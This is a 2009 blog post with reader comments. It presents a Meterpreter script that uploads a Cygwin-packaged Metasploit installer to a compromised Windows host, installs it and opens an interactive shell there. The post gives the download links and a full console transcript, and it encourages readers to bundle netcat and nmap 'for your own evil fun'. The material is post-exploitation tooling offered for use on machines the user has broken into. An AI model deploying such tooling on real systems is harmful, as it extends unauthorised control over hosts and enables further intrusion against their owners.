Metasploit Framework as a Payload
Friday, June 26, 2009 at 1:45AM
Well, sorta…
I created a Meterpreter script that takes the Cygwin-bundled version of Metasploit, packaged inside a NullSoft installer that HD Moore created, uploads it to the compromised host through Meterpreter, extracts and installs it, and runs the shell. I left this intentionally open so that you can package your own Cygwin bundle (possibly with nmap and netcat) for your own evil fun.
Thanks definitely go to Carlos Perez (Dark0perator) and HD Moore for their help getting this bad boy working right.
You can download the script here: /scripts-and-programs/metasploit/deploymsf.rb
You can download the cygwin installs from the metasploit website:
13mb FULL framework: https://metasploit.com/framework-3.3-dev.exe
5mb MINI (just msfconsole): https://metasploit.com/mini-3.3-dev.exe
And here is what it looks like:
meterpreter > run deploymsf -f framework-3.3-dev.exe
[*] Running Meterpreter MSFp Deploytment Script.....
[*] Uploading MSFp for for deployment....
[*] MSFp uploaded as C:\DOCUME~1\mubix\LOCALS~1\Temp\12681.exe
[*] Installing MSFp...........
[*] Done!
[*] Installation Complete!
[*] Running cygwin shell channelized...
[*] Channel 18 created - Type: interact 18 to play
[*] Be warned, it takes a bit for post setup to happen
[*] and you will not see a prompt, try pwd to check
meterpreter > interact 18
Interacting with channel 18...
[*] Configuring multi-user permissions for first run...
[*] Configuring the initial user environment...
pwd
/home/mubix
ls
msfconsole
*** Metasploit only has EXPERIMENTAL support for Ruby 1.9.1 and newer, things may break!
*** Please report bugs to msfdev[at]metasploit.com
[-] ***
[-] * WARNING: No database support: LoadError no such file to load -- active_record
[-] ***
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
=[ msf v3.3-dev
+ -- --=[ 379 exploits - 231 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 156 aux
msf >
GAME OVER
Rob Fuller | 4 Comments | metasploit, meterpreter, script in Hacking
Reader Comments (4)
Good post; have shared with my team...
As Borat said...."Veddy Nice, Veddy nice"
Nice tool, Thanks.
Hi :D
I know this is bumping an AGE old post (almost two years now), but a situation has come up where this exact solution would be perfect.
But, I am slightly taken aback by the fact that the 3.3-dev installer has been taken offline, and I am wondering how exactly you get a cygwin shell as a session in meterpreter. I have managed to install the latest metasploit framework (3.6) on a Windows host, but the issue is as soon as I try to start msfconsole, or any tool, it starts up in console.exe, in the GUI, which is fairly annoying.
Is there any way to start the latest metasploit within a cygwin shell in command prompt/a session in meterpreter?
Thank you very much for your help,
iVind